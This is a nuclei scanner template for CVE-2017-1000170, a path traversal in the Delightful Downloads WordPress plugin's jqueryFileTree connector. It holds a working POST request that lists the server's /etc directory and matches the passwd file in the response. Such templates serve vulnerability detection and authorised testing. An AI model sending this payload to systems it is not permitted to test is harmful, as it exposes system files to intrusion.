nuclei-templates/cves/2017/CVE-2017-1000170.yaml

26 lines
776 B
YAML

id: CVE-2017-1000170
info:
name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal
author: dwisiswant0
severity: high
reference: https://www.exploit-db.com/exploits/49693
description: jqueryFileTree 2.1.5 and older Directory Traversal
tags: cve,cve2017,wordpress,wp-plugin,lfi
requests:
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"
body: "dir=%2Fetc%2F&onlyFiles=true"
matchers-condition: and
matchers:
- type: word
words:
- "<li class='file ext_passwd'>"
- "<a rel='/passwd'>passwd</a></li>"
condition: and
part: body
- type: status
status:
- 200